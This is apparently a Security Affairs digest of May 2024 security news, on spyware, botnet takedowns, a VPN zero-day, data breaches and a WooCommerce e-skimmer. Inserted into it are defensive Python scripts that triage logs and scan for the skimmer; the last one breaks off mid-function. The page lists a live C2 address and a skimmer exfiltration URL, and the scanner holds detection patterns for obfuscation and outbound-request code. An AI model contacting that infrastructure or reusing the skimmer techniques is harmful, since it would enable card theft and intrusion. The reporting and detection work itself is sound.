Today — 30 May 2024 (Security Affairs)

Experts found a macOS version of the sophisticated LightSpy spyware

30 May 2024 at 18:35

Researchers spotted a macOS version of the LightSpy surveillance framework that has been active in the wild since at least January 2024.

Researchers from ThreatFabric discovered a macOS version of the LightSpy spyware that has been active in the wild since at least January 2024.

ThreatFabric observed threat actors using two publicly available exploits (CVE-2018-4233, CVE-2018-4404) to deliver macOS implants. The experts noticed that a portion of the CVE-2018-4404 exploit is likely borrowed from the Metasploit framework.

The macOS version of LightSpy supports 10 plugins to exfiltrate private information from devices.

LightSpy is a modular spyware that has resurfaced after several months of inactivity; the new version is built on a modular framework with extensive spying capabilities.

LightSpy can steal files from multiple popular applications like Telegram, QQ, and WeChat, as well as personal documents and media stored on the device. It can also record audio and harvest a wide array of data, including browser history, WiFi connection lists, installed application details, and even images captured by the device’s camera. The malware also grants attackers access to the device’s system, enabling them to retrieve user Keychain data and device lists and to execute shell commands, potentially gaining full control over the device.

The researchers reported that starting from January 11, 2024, several URLs containing the number “96382741” were uploaded to VirusTotal. These URLs pointed to HTML and JavaScript files published on GitHub, which were related to the CVE-2018-4233 vulnerability. The flaw resides in WebKit and impacts macOS version 10.13.3 and iOS versions before 11.4. The researchers noticed that the number “96382741” was previously used as a path name for hosting LightSpy malware files for both Android and iOS.

“The starting point threat actor group used the same approach as for iOS implant distribution: triggering WebKit vulnerability inside Safari to perform unprivileged arbitrary code execution. For macOS, attackers used CVE-2018-4233 exploit, whose source code was published on the 18th of August 2018.” reads the analysis published by ThreatFabric. “Since the vulnerability affected both iOS and macOS WebKits, both iOS and macOS implants might have been delivered in the same way for some time. The difference was in lateral local privilege escalation, which is OS-specific.”

The plugins for the macOS version are different from those for other platforms, reflecting the architecture of the target systems. Notably, the desktop version has fewer exfiltration functions compared to the mobile version.

On March 21, 2024, the panel content first appeared on VirusTotal, displayed as a web page background. The next day, the panel URL was also found on VirusTotal, associated with Android LightSpy. Initial analysis revealed that the panel’s code had a critical mistake: it checked for authorization only after loading all scripts, briefly displaying the authenticated view to unauthorized users.

“However, in the top right corner of the window, there was a button labeled “Remote control platform,” pointing to another panel on the same control server. Due to catastrophic misconfiguration, we were able to access this panel, and anyone could do the same by accessing the top-level panel.” continues the report. “This panel contained comprehensive information about victims, fully correlating with all the exfiltration data provided in the technical analysis section of this report.”

“It became evident that regardless of the targeted platform, the threat actor group focused on intercepting victim communications, such as messenger conversations and voice recordings. For macOS, a specialised plugin was designed for network discovery, aiming to identify devices in proximity to the victim.” concludes the report. “Despite our findings, some aspects of the LightSpy puzzle remain elusive. There is no evidence confirming the existence of implants for Linux and routers, nor is there information on how they might be delivered. However, their potential functionality is known based on panel analysis.”

The researchers also provided indicators of compromise (IoCs) for this version of the spyware.

Pierluigi Paganini

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

(SecurityAffairs – hacking, malware)

Operation Endgame, the largest law enforcement operation ever against botnets

30 May 2024 at 08:52

An international law enforcement operation, called Operation Endgame targeted multiple botnets and their operators.

Between 27 and 29 May 2024, an international law enforcement operation coordinated by Europol, codenamed Operation Endgame, targeted malware droppers like IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot.

The joint actions were carried out by authorities in the Netherlands, Germany, France, Denmark, United States, and the United Kingdom with support from Europol and Eurojust. In addition, with the cooperation of the aforementioned authorities, there have also been police actions in Ukraine, Switzerland, Armenia, Portugal, Romania, Canada, Lithuania and Bulgaria for the arrest or interrogation of suspects, searches or the seizure and downing of servers.

It is the largest operation ever against botnets, which are crucial in deploying ransomware.

These malicious codes are essential in the attack chain: they act as loaders for additional payloads, and some of them are also used to perform post-exploitation activities, including privilege escalation, reconnaissance, and credential theft.

The operation aimed to disrupt criminal services by arresting key individuals, dismantling infrastructures, and freezing illegal proceeds. Europol states that this operation had a global impact on the dropper ecosystem, which facilitated ransomware and other malicious attacks. Following the operation, eight fugitives linked to these activities will be added to Europe’s Most Wanted list on 30 May 2024. This large-scale operation, led by France, Germany, and the Netherlands, and supported by Eurojust, involved multiple countries and private partners.

The coordinated actions led to:

  • 4 arrests (1 in Armenia and 3 in Ukraine)
  • 16 location searches (1 in Armenia, 1 in the Netherlands, 3 in Portugal and 11 in Ukraine)
  • Over 100 servers taken down or disrupted in Bulgaria, Canada, Germany, Lithuania, the Netherlands, Romania, Switzerland, the United Kingdom, the United States and Ukraine 
  • Over 2 000 domains under the control of law enforcement

“Furthermore, it has been discovered through the investigations so far that one of the main suspects has earned at least EUR 69 million in cryptocurrency by renting out criminal infrastructure sites to deploy ransomware.” reads the press release published by EUROPOL. “The suspect’s transactions are constantly being monitored and legal permission to seize these assets upon future actions has already been obtained.”

Droppers are used to install other malware into target systems. They serve as the first stage of a malware attack, enabling attackers to deploy harmful programs like viruses, ransomware, or spyware.

Below are the descriptions for the botnets targeted by the operation:

  • SystemBC: Facilitates anonymous communication between infected systems and command-and-control servers.
  • Bumblebee: Distributed via phishing campaigns or compromised websites, it enables the delivery and execution of further payloads.
  • SmokeLoader: Used primarily as a downloader to install additional malicious software.
  • IcedID (BokBot): Initially a banking trojan, now used for various cybercrimes, including financial data theft.
  • Pikabot: A trojan that provides initial access to infected computers, enabling ransomware deployments, remote takeovers, and data theft.

“Operation Endgame does not end today. New actions will be announced on the website Operation Endgame. In addition, suspects involved in these and other botnets, who have not yet been arrested, will be directly called to account for their actions. Suspects and witnesses will find information on how to reach out via this website.” concludes the announcement.

However, the criminal activity behind the targeted botnets is still continuing: the malware researcher Rohit Bansal, who goes online with the handle “R.”, warns of a still active server spreading the SystemBC malware.

🚨 Found Another Active #SystemBC #Malware spreading from ON-LINE-DATA server in Netherlands (AS204601).

C2 IP:
cobusabobus[.]cam:4001 / 212.162.153.199

Malware Hash:
0dd1f6c2b9bf477115701a1340d8d9a2

81 Victims Confirmed 👇
Stay vigilant! 🛡 #threatintel pic.twitter.com/cYUkt3csP1

— R. (@0xrb) May 30, 2024

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Endgame)

Law enforcement operation dismantled 911 S5 botnet

30 May 2024 at 08:07

An international law enforcement operation led by the U.S. DoJ disrupted the 911 S5 botnet and led to the arrest of its administrator.

The U.S. Justice Department led an international law enforcement operation that dismantled the 911 S5 proxy botnet. Law enforcement also arrested its administrator, the 35-year-old Chinese national YunHe Wang, in Singapore. The authorities sanctioned Wang and his co-conspirators. Since 2011, Wang and his co-conspirators had been distributing malware through malicious VPN applications, including MaskVPN, DewVPN, PaladinVPN, ProxyGate, ShieldVPN, and ShineVPN. The compromised devices were recruited into the 911 S5 residential proxy service.

“According to an indictment unsealed on May 24, from 2014 through July 2022, Wang and others are alleged to have created and disseminated malware to compromise and amass a network of millions of residential Windows computers worldwide.” reads the press release published by DoJ. “These devices were associated with more than 19 million unique IP addresses, including 613,841 IP addresses located in the United States. Wang then generated millions of dollars by offering cybercriminals access to these infected IP addresses for a fee.”

According to court documents, the gang bundled the malware with other program files, including pirated versions of licensed software or copyrighted materials. Wang operated approximately 150 dedicated servers worldwide, approximately 76 of which he leased from U.S.-based online service providers.

Wang utilized dedicated servers to deploy and manage applications, control infected devices, operate the 911 S5 service, and offer paying customers access to proxied IP addresses associated with these compromised devices.

“As alleged in the indictment, Wang created malware that compromised millions of residential computers around the world and then sold access to the infected computers to cybercriminals,” said Principal Deputy Assistant Attorney General Nicole M. Argentieri, head of the Justice Department’s Criminal Division. “These criminals used the hijacked computers to conceal their identities and commit a host of crimes, from fraud to cyberstalking. Cybercriminals should take note. Today’s announcement sends a clear message that the Criminal Division and its law enforcement partners are firm in their resolve to disrupt the most technologically sophisticated criminal tools and hold wrongdoers to account.”

The FBI has published information at fbi.gov/911S5 to help identify and remove 911 S5’s VPN applications from your devices or machines.

The FBI shared instructions on how to identify and remove VPN Applications containing the 911 S5 bot.

Cybercriminals used 911 S5 to hide their real IP addresses and locations while committing various crimes, including financial fraud, stalking, bomb threats, illegal exportation of goods, and child exploitation. Since 2014, 911 S5 has allegedly helped cybercriminals bypass financial fraud detection systems, leading to billions of dollars in theft from financial institutions, credit card issuers, and federal lending programs.

During the pandemic, crooks used the botnet to target relief programs, resulting in significant fraud. The U.S. estimates that 560,000 fraudulent unemployment claims, amounting to over $5.9 billion, originated from compromised IP addresses. Additionally, over 47,000 Economic Injury Disaster Loan (EIDL) applications were linked to these IP addresses, causing millions in losses for financial institutions.

The 911 S5 client software, hosted on U.S. servers, allowed cybercriminals outside the U.S. to purchase goods with stolen credit cards and illegally export them, violating U.S. export laws. The software may also contain encryption or features subject to export controls under the Export Administration Regulations (EAR), potentially leading to further legal violations by foreign nationals downloading it without a license.

“The indictment further alleges that from 2018 until July 2022, Wang received approximately $99 million from his sales of the hijacked proxied IP addresses through his 911 S5 operation, either in cryptocurrency or fiat currency.” continues DoJ. “Wang used the illicitly gained proceeds to purchase real property in the United States, St. Kitts and Nevis, China, Singapore, Thailand, and the United Arab Emirates. The indictment identifies dozens of assets and properties subject to forfeiture, including a 2022 Ferrari F8 Spider S-A, a BMW i8, a BMW X7 M50d, a Rolls Royce, more than a dozen domestic and international bank accounts, over two dozen cryptocurrency wallets, several luxury wristwatches, 21 residential or investment properties (across Thailand, Singapore, the U.A.E., St. Kitts and Nevis, and the United States), and 20 domains.”

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) issued sanctions against Yunhe Wang and two other Chinese nationals, Jingping Liu and Yanni Zheng, for their role in criminal activities associated with the 911 S5 botnet. Additionally, OFAC sanctioned three entities—Spicy Code Company Limited, Tulip Biz Pattaya Group Company Limited, and Lily Suites Company Limited—due to their ownership or control by Yunhe Wang.

Yunhe Wang faces a maximum penalty of 65 years in prison if convicted on all counts. These charges include conspiracy to commit computer fraud, substantive computer fraud, conspiracy to commit wire fraud, and conspiracy to commit money laundering.

Pierluigi Paganini

(SecurityAffairs – hacking, 911 S5 botnet)

Okta warns of credential stuffing attacks targeting its Cross-Origin Authentication feature

30 May 2024 at 06:54

Identity and access management firm Okta warns of credential stuffing attacks targeting the Customer Identity Cloud (CIC) feature.

Okta warns of credential stuffing attacks targeting its Customer Identity Cloud (CIC) feature since April.

A credential stuffing attack is a type of cyber attack where hackers use large sets of username and password combinations, typically obtained from previous data breaches, phishing campaigns, or info-stealer infections, to gain unauthorized access to user accounts on various online services. Credential stuffing attacks exploit the widespread practice of using the same login credentials across multiple online accounts. Attackers automate the process of trying these credentials on various websites until they find a match, granting them unauthorized access to compromised accounts. This method poses a risk of exposing sensitive data or enabling fraudulent activities.

The identity and access management firm observed suspicious activity that started on April 15. 

The advisory published by the company states that the attacks targeted the endpoints supporting the cross-origin authentication feature and hit several customers.

“Okta has determined that the cross-origin authentication feature in Customer Identity Cloud (CIC) is prone to being targeted by threat actors orchestrating credential-stuffing attacks.” reads the advisory. “For context, we observed that the endpoints used to support the cross-origin authentication feature being attacked via credential stuffing for a number of our customers.”

Cross-Origin Resource Sharing (CORS) is a mechanism that allows a web page to make an AJAX call using XMLHttpRequest (XHR) to a domain different from the one the script was loaded from. Such cross-domain requests would otherwise be forbidden by web browsers under the same-origin security policy. CORS defines a standardized way in which the browser and the server interact to determine whether to allow the cross-origin request.

The company notified the targeted customers that have this feature enabled, and it also recommends disabling the targeted URLs if they are not in use.

Okta recommends reviewing suspicious activity from April 15 onward, and it suggests reviewing the following log events:

  • fcoa – Failed cross-origin authentication
  • scoa – Successful cross-origin authentication
  • pwd_leak – Someone attempted to login with a leaked password
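One way to carry out that review, written here as an added example rather than Okta's own tooling: the script below takes Customer Identity Cloud (Auth0) log entries, keeps only the three event types named in the advisory from April 15 onward, and groups them by source IP, flagging sources that show the credential-stuffing pattern (many failures spread over many accounts, leaked-password attempts, or a success from a source that also generated failures). The event dicts are assumed to carry `type`, `date`, `ip` and `user_name` keys in the Auth0 log style; the sample events are constructed.

```python
"""Review Customer Identity Cloud (Auth0) log events for credential stuffing.

Added example; this is not Okta's tooling.  Assumed: each event is a dict
shaped like an Auth0 log entry with "type", "date", "ip" and "user_name"
keys.  The event type codes fcoa, scoa and pwd_leak come from the advisory.
"""
from collections import defaultdict
from datetime import datetime, timezone

REVIEW_FROM = datetime(2024, 4, 15, tzinfo=timezone.utc)   # start date named in the advisory
WATCHED_TYPES = {"fcoa", "scoa", "pwd_leak"}

# Constructed sample events (not real log data): 203.0.113.9 sprays several
# accounts, then succeeds against one; 198.51.100.7 is a normal single login.
# "other" is a placeholder for any event type outside the watched set.
SAMPLE_EVENTS = [
    {"type": "fcoa", "date": "2024-04-14T23:59:00.000Z", "ip": "203.0.113.9", "user_name": "a@example.com"},
    {"type": "fcoa", "date": "2024-04-16T08:00:00.000Z", "ip": "203.0.113.9", "user_name": "a@example.com"},
    {"type": "fcoa", "date": "2024-04-16T08:00:01.000Z", "ip": "203.0.113.9", "user_name": "b@example.com"},
    {"type": "fcoa", "date": "2024-04-16T08:00:02.000Z", "ip": "203.0.113.9", "user_name": "c@example.com"},
    {"type": "pwd_leak", "date": "2024-04-16T08:00:03.000Z", "ip": "203.0.113.9", "user_name": "d@example.com"},
    {"type": "scoa", "date": "2024-04-16T08:00:04.000Z", "ip": "203.0.113.9", "user_name": "d@example.com"},
    {"type": "scoa", "date": "2024-04-17T09:00:00.000Z", "ip": "198.51.100.7", "user_name": "e@example.com"},
    {"type": "other", "date": "2024-04-17T09:00:05.000Z", "ip": "198.51.100.7", "user_name": "e@example.com"},
]


def parse_date(value):
    """Parse the ISO-8601 UTC timestamp format used in the sample events."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def select_events(events, since=REVIEW_FROM):
    """Keep only the three watched event types dated on or after the review start."""
    return [e for e in events if e["type"] in WATCHED_TYPES and parse_date(e["date"]) >= since]


def summarize_by_ip(events):
    """Count each watched type per source IP and collect the accounts it touched."""
    per_ip = defaultdict(lambda: {"fcoa": 0, "scoa": 0, "pwd_leak": 0, "users": set()})
    for e in events:
        stats = per_ip[e["ip"]]
        stats[e["type"]] += 1
        stats["users"].add(e["user_name"])
    return per_ip


def flag_sources(per_ip, min_failures=3, min_users=3):
    """Return {ip: [reasons]} for sources whose pattern looks like credential stuffing."""
    flagged = {}
    for ip, stats in per_ip.items():
        reasons = []
        # Many failed cross-origin authentications spread over many accounts
        # is the signature of a combo list being replayed from one source.
        if stats["fcoa"] >= min_failures and len(stats["users"]) >= min_users:
            reasons.append("repeated fcoa across multiple accounts")
        if stats["pwd_leak"]:
            reasons.append("login attempted with a known-leaked password")
        # A success from a source that also produced failures deserves a
        # session review: the credential may have been valid for one victim.
        if stats["scoa"] and stats["fcoa"]:
            reasons.append("scoa from a source that also generated fcoa")
        if reasons:
            flagged[ip] = reasons
    return flagged


def triage(events=SAMPLE_EVENTS):
    """Full pipeline: filter, aggregate, flag."""
    return flag_sources(summarize_by_ip(select_events(events)))


if __name__ == "__main__":
    for ip, reasons in triage().items():
        print(ip, "->", "; ".join(reasons))
```

The thresholds are deliberately low so the constructed sample trips them; on real volumes they should be tuned per tenant, and a flagged `scoa` is the event to follow up first, since it marks an account where a replayed credential actually worked.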

At the end of April, Okta observed a surge in credential stuffing attacks against online services, aided by the widespread availability of residential proxy services, lists of previously compromised credentials (“combo lists”), and automation tools.

From April 19, 2024 through to April 26, 2024, the Okta Identity Threat Research team observed a spike in credential stuffing activity against user accounts from what appears to be similar infrastructure.

The latest advisory includes recommendations to mitigate these attacks.

The company also shared recommendations on how to best protect customers from credential-stuffing attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, Okta)

Yesterday — 29 May 2024 (Security Affairs)

Check Point released hotfix for actively exploited VPN zero-day

29 May 2024 at 18:27

Check Point released hotfixes for a VPN zero-day vulnerability, tracked as CVE-2024-24919, which is actively exploited in attacks in the wild.

Check Point released hotfixes to address a VPN zero-day vulnerability, tracked as CVE-2024-24919, which is actively being exploited in attacks in the wild.

The vulnerability CVE-2024-24919 is a Quantum Gateway information disclosure issue. Threat actors exploited the flaw to gain remote firewall access and breach corporate networks.

The issue impacts CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, Quantum Spark Appliances. Impacted versions are R80.20.x, R80.20SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.

Early this week, the security firm warned of a surge in attacks aimed at VPN solutions.

“We have recently witnessed compromised VPN solutions, including various cyber security vendors. In light of these events, we have been monitoring attempts to gain unauthorized access to VPNs of Check Point’s customers. By May 24, 2024 we identified a small number of login attempts using old VPN local-accounts relying on unrecommended password-only authentication method,” the company said.

The company started investigating the attacks by assembling special teams of Incident Response, Research, Technical Services and Products professionals. Within 24 hours, the experts identified a few customers that had potentially been attacked.

On May 28, the experts discovered how attackers were targeting its customers and released a fix for Check Point Network Security gateways.

“The vulnerability potentially allows an attacker to read certain information on Internet-connected Gateways with remote access VPN or mobile access enabled. The attempts we’ve seen so far, as previously alerted on May 27, focus on remote access scenarios with old local accounts with unrecommended password-only authentication.” reads an update to the initial advisory. “Within a few hours of this development, Check Point released an easy to implement solution that prevents attempts to exploit this vulnerability. To stay secure, customers should follow these simple instructions to deploy the provided solution.”

The company also released hotfixes that address the flaw in end-of-life (EOL) versions.

Check Point set up an FAQ page to provide information about CVE-2024-24919, such as what customers should do if they suspect unauthorized access attempts.

Pierluigi Paganini

(SecurityAffairs – hacking, Check Point VPN zero-day)

BreachForums resurrected after FBI seizure

29 May 2024 at 12:07

The cybercrime forum BreachForums has been resurrected two weeks after a law enforcement operation that seized its infrastructure.

The cybercrime forum BreachForums is online again, two weeks after a US law enforcement operation seized its infrastructure and took down the platform.

🚨#BREAKING🚨Registration to BreachForums is now open.. however be extremely cautious!#DarkWeb #Cybersecurity #Cyberattack #Cybercrime #Malware #Privacy #Infosec pic.twitter.com/NKUsGeEGmk

— Dark Web Informer (@DarkWebInformer) May 28, 2024

The platform is now reachable at breachforums[.]st, which was one of the domains used in the past by the cybercrime forum.

The admin, who is using the moniker ShinyHunters, announced the return:

It is unclear if the current administrator is the notorious ShinyHunters hacker who operated from the platform before the law enforcement operation.

Yay. #breachforums pic.twitter.com/Osiv8CA3MI

— Brett Callow (@BrettCallow) May 27, 2024

ShinyHunters claimed the hack of Ticketmaster and offered for sale 1.3 TB of data, including full details of 560 million customers, for $500,000. Stolen data includes names, emails, addresses, phone numbers, ticket sales, and order details.

CyberKnow researchers speculate that the Ticketmaster data breach claim has provided BreachForums with the quick attention it needs to boost its user numbers and reputation.

🚨🚨Thoughts on the alleged Ticketmaster Data Breach 🚨🚨

TLDR: Alert not Alarmed

The Ticketmaster data breach claim has provided BreachForums with the quick attention they need to boost their user numbers and reputation.

The claim has possibly been over-stated to boost… pic.twitter.com/WJsFkBfQbw

— CyberKnow (@Cyberknow20) May 29, 2024

Hackread.com reported that ShinyHunters regained control of domains despite the FBI’s efforts, exposing notable operational setbacks and security lapses. However, we cannot exclude that the site is a honeypot set up by the feds.

From June 2023 until May 2024, BreachForums (hosted at breachforums.st/.cx/.is/.vc) was run by the notorious actor ShinyHunters.

From March 2022 until March 2023, a separate version of BreachForums (hosted at breached.vc/.to/.co) was run by the threat actor Pompompurin. In July 2023, the owner of the BreachForums Conor Brian Fitzpatrick, aka Pompompurin, pleaded guilty to hacking charges.

In March 2023, U.S. law enforcement arrested Pompompurin; the agents spent hours inside and outside the suspect’s home and were seen removing several bags of evidence from the house.

The man has been charged with soliciting individuals with the purpose of selling unauthorized access devices. Fitzpatrick was released on a $300,000 bond signed by his parents.

The BreachForums hacking forum was launched in 2022 after law enforcement authorities seized RaidForums as a result of Operation TOURNIQUET. Pompompurin always declared that he was ‘not affiliated with RaidForums in any capacity.’

RaidForums (hosted at raidforums.com and run by Omnipotent) was the predecessor hacking forum to both versions of BreachForums and ran from early 2015 until February 2022.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

ABN Amro discloses data breach following an attack on a third-party provider

29 May 2024 at 06:26

Dutch bank ABN Amro discloses a data breach after a ransomware attack hit the third-party services provider AddComm.

Dutch bank ABN Amro disclosed a data breach after third-party services provider AddComm suffered a ransomware attack. AddComm distributes documents and tokens physically and digitally to clients and employees.

The ransomware attack occurred last week and unauthorized parties may have obtained access to data of a limited number of ABN AMRO clients. ABN AMRO is going to contact the impacted clients and notified the Dutch Data Protection Authority and regulators.

At the time of this writing, AddComm has contained the incident, the impacted systems have been restored, and the company has locked out the attackers. AddComm has yet to determine what type of data may have been stolen during the attack. However, the company is investigating the incident with the help of external security experts working for AddComm.

The Dutch bank has stopped using services provided by AddComm.

At the moment, there are no indications that attackers have used the data of ABN AMRO clients. The bank also warns clients to stay alert to phishing messages.

The bank added that its systems have not been affected by the ransomware attack.

“External cybersecurity experts are currently investigating exactly what data has been stolen at AddComm. We are writing to customers whose data may be involved in this attack.” states the bank.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Before yesterday (Security Affairs)

Christie’s disclosed a data breach after a RansomHub attack

28 May 2024 at 21:28

Auction house Christie’s disclosed a data breach following a RansomHub cyber attack that occurred this month.

Auction house Christie’s disclosed a data breach after the ransomware group RansomHub threatened to leak stolen data. The security breach occurred earlier this month.

The website of the auction house was unreachable after the attack.

According to the BBC, Christie’s had problems selling art and other high-value items worth an estimated $840 million due to the cyberattack. The spring auctions include a Vincent van Gogh painting valued at $35 million and rare wine, among other lots.

Some sales have been delayed due to the cyber attack.

RansomHub claimed responsibility for the attack and added the company to its Tor leak site. The extortion group said they had stolen 2GB of sensitive information, including personal information belonging to at least 500,000 Christie’s clients.

“While utilizing access to Christies network we were able to gain access to their customers sensitive personal information including [BirthPlace MRZFull DocumentNumber BirthDate ExpiryDate FirstName LastName IssueDate IssuingAuthority Sex DocumentCategory DocumentType NationalityName] as well as address, height, race and much more sensitive information for at least 500,000 of their private clients from all over the world.” states the group.

The group is threatening to leak the stolen data if the victim does not pay the ransom by Sunday, June 2, 2024.

The gang said it has attempted to negotiate the payment with the auction house without success, and added that once it posts the stolen data, Christie’s will incur heavy fines under the GDPR.

“Earlier this month Christie’s experienced a technology security incident. We took swift action to protect our systems, including taking our website offline,” a company spokesman told BleepingComputer. “Our investigations determined there was unauthorized access by a third party to parts of Christie’s network. They also determined that the group behind the incident took some limited amount of personal data relating to some of our clients.”

The auction house is notifying privacy regulators and law enforcement, and it is also going to inform impacted clients.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Experts released PoC exploit code for RCE in Fortinet SIEM

28 May 2024 at 18:43

Researchers released a proof-of-concept (PoC) exploit for the remote code execution flaw CVE-2024-23108 in Fortinet’s SIEM solution.

Security researchers at Horizon3’s Attack Team released a proof-of-concept (PoC) exploit for a remote code execution issue, tracked as CVE-2024-23108, in Fortinet’s SIEM solution. The PoC exploit allows executing commands as root on Internet-facing FortiSIEM appliances.

In February, cybersecurity vendor Fortinet warned of two critical vulnerabilities in FortiSIEM, tracked as CVE-2024-23108 and CVE-2024-23109 (CVSS score 10), which could lead to remote code execution.

“Multiple improper neutralization of special elements used in an OS Command vulnerability [CWE-78] in FortiSIEM supervisor may allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests.” reads the advisory published by Fortinet.

The affected products are:

  • FortiSIEM version 7.1.0 through 7.1.1
  • FortiSIEM version 7.0.0 through 7.0.2
  • FortiSIEM version 6.7.0 through 6.7.8
  • FortiSIEM version 6.6.0 through 6.6.3
  • FortiSIEM version 6.5.0 through 6.5.2
  • FortiSIEM version 6.4.0 through 6.4.2

CERT-EU also published an advisory for the above vulnerabilities:

“In February 2024, Fortinet quietly updated a 2023 advisory, joining two critical flaws to the list of OS Command vulnerabilities affecting its FortiSIEM product. If exploited, these vulnerabilities could allow a remote unauthenticated attacker to execute commands on the system.” reads the advisory published by CERT-EU. “Updating is recommended as soon as possible.”

This week, Horizon3’s Attack Team also published a technical analysis of the vulnerability.

“While the patches for the original PSIRT issue, FG-IR-23-130, attempted to escape user-controlled inputs at this layer by adding the wrapShellToken() utility, there exists a second order command injection when certain parameters to datastore.py are sent. There” reads the analysis.

The researchers noticed that the logs for the phMonitor service, located at /opt/phoenix/logs/phoenix.log, provide detailed records of received messages. Any exploitation attempt of CVE-2024-23108 will generate log entries indicating a failed command with “datastore.py nfs test.” These lines should be used as indicators of compromise to detect exploitation attempts.
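A defender can turn that indicator into a routine check. The script below is an added example, not Horizon3's or Fortinet's code: it walks a phMonitor log and reports every failed-command record that carries the “datastore.py nfs test” substring named in the analysis. The article does not show the real phoenix.log line layout, so the sample lines are constructed and the parser only relies on a leading timestamp, the indicator substring and a failure marker; the log path is the one given in the article.

```python
"""Scan a phMonitor log for the CVE-2024-23108 exploitation indicator.

Added example; not Horizon3's or Fortinet's tooling.  The real phoenix.log
line layout is not shown in the article: the sample lines below are
constructed, and only the indicator substring ("datastore.py nfs test" in a
failed-command record) and the log path come from the page.
"""
import re

LOG_PATH = "/opt/phoenix/logs/phoenix.log"     # location named in the article
INDICATOR = "datastore.py nfs test"            # substring named in the analysis

# Constructed sample log (not real output).  Lines 2 and 4 carry the
# indicator inside a failed-command record; line 3 mentions nothing relevant.
SAMPLE_LOG = """\
2024-05-28 10:00:01 phMonitor[1234]: [INFO] received message type=heartbeat
2024-05-28 10:00:07 phMonitor[1234]: [ERROR] command failed: datastore.py nfs test 10.0.0.99 exit=1
2024-05-28 10:00:09 phMonitor[1234]: [INFO] received message type=status
2024-05-28 10:01:15 phMonitor[1234]: [ERROR] command failed: datastore.py nfs test example exit=1
"""

FAILURE_RE = re.compile(r"\bfail(?:ed|ure)?\b", re.IGNORECASE)
TIMESTAMP_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})")


def find_indicators(log_text):
    """Return one record per line that is both a failed command and carries the indicator."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        if INDICATOR in line and FAILURE_RE.search(line):
            match = TIMESTAMP_RE.match(line)
            hits.append({
                "line": number,
                "timestamp": match.group(1) if match else None,
                "text": line.strip(),
            })
    return hits


def scan_file(path=LOG_PATH):
    """Read the log from disk and run the same check; errors='replace' keeps a
    partially corrupted log from aborting the scan."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return find_indicators(handle.read())


if __name__ == "__main__":
    for hit in find_indicators(SAMPLE_LOG):
        print(f"line {hit['line']} @ {hit['timestamp']}: {hit['text']}")
```

Because phMonitor logs every received message, the same scan can be scheduled against rotated copies of phoenix.log to establish whether attempts predate the patch; a hit is a trigger for the appliance's incident process, not proof of a successful compromise.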

Pierluigi Paganini

(SecurityAffairs – hacking, SIEM)

WordPress Plugin abused to install e-skimmers in e-commerce sites

28 May 2024 at 08:43

Threat actors are exploiting a WordPress plugin to insert malicious PHP code in e-commerce sites and steal credit card data.

Sucuri researchers observed threat actors using a PHP snippet WordPress plugin to install malicious code in WooCommerce e-stores and harvest credit card details.

In the campaign spotted by the experts, attackers use a very obscure WordPress plugin called Dessky Snippets, which has only a few hundred active installations at the time of writing.

Dessky Snippets is a lightweight and simple plugin that gives users the ability to easily add custom PHP code from WordPress admin.

The campaign occurred on May 11th, and the researchers observed a surge in downloads of the Dessky Snippets plugin from that same day. At this time, the WordPress plugin has over 200 active installations.

Dessky Snippets WordPress Plugin

Attackers exploited the Dessky Snippets plugin to insert a server-side PHP credit card e-skimmer.

“This malicious code was saved in the dnsp_settings option in the WordPress wp_options table and was designed to modify the checkout process in WooCommerce by manipulating the billing form and injecting its own code.” reads the analysis published by Sucuri.

The malware has two main components. The first part uses a fake function named “twentytwenty_get_post_logos()” to hook into WooCommerce’s billing form. The function adds additional fields to the billing form to request credit card details earlier than usual. The second part involves an obfuscated credit card skimmer that monitors POST data for specific parameters. When the malware detects these parameters, it sends all the collected billing and credit card information to a third-party URL “hxxps://2of[.]cc/wp-content/”.

The researchers noticed that the billing form associated with the overlay used by the attackers has the autocomplete feature disabled: the fields are set with autocomplete="off".

Disabling the auto-fill feature on the fake checkout form is an evasion trick that reduces the chances of the browser warning users about entering sensitive information. The fields remain blank until manually filled out, making them look like regular, necessary inputs for the transaction and reducing user suspicion.
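The traits described above (code stored in the dnsp_settings option, a hook into the WooCommerce billing form, fields with autocomplete="off", a watch on POST data, an outbound request to the exfiltration URL) can be turned into a check over a wp_options export. The scanner below is an added example, not Sucuri's tooling; the option name, the function name and the defanged URL come from the analysis quoted above, the generic patterns are my own assumptions about what injected checkout code tends to contain, and the sample rows (including the "malicious" PHP fragment and its placeholder hook name) are constructed for the test.

```python
"""Scan wp_options rows for a Dessky Snippets e-skimmer (added example)."""
import re

# Indicators taken from the Sucuri analysis, kept defanged as on the page.
SKIMMER_FUNCTION = "twentytwenty_get_post_logos"
EXFIL_URL = "hxxps://2of[.]cc/wp-content/"
SNIPPET_OPTION = "dnsp_settings"  # Dessky Snippets stores its PHP here


def refang(text: str) -> str:
    """Turn defanged IoCs (hxxp, [.]) back into the form found in live data."""
    return text.replace("hxxp", "http").replace("[.]", ".")


EXFIL_HOST = re.search(r"https?://([^/]+)", refang(EXFIL_URL)).group(1)  # "2of.cc"

# Generic traits of injected checkout code (assumption); none is proof alone.
GENERIC = {
    "obfuscation": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "checkout_hook": re.compile(r"add_(?:action|filter)\s*\(\s*['\"]woocommerce_", re.I),
    "autocomplete_off": re.compile(r"autocomplete\s*=\s*\\?['\"]off", re.I),
    "reads_post": re.compile(r"\$_POST\s*\["),
    "outbound_request": re.compile(
        r"\b(curl_init|curl_exec|wp_remote_post|file_get_contents)\s*\(", re.I),
}


def assess_option(name: str, value: str) -> dict:
    """Classify one wp_options row as clean, suspicious or malicious."""
    value = refang(value)
    findings = []
    if SKIMMER_FUNCTION in value:
        findings.append("known_skimmer_function")
    if EXFIL_HOST in value:
        findings.append("known_exfil_host")
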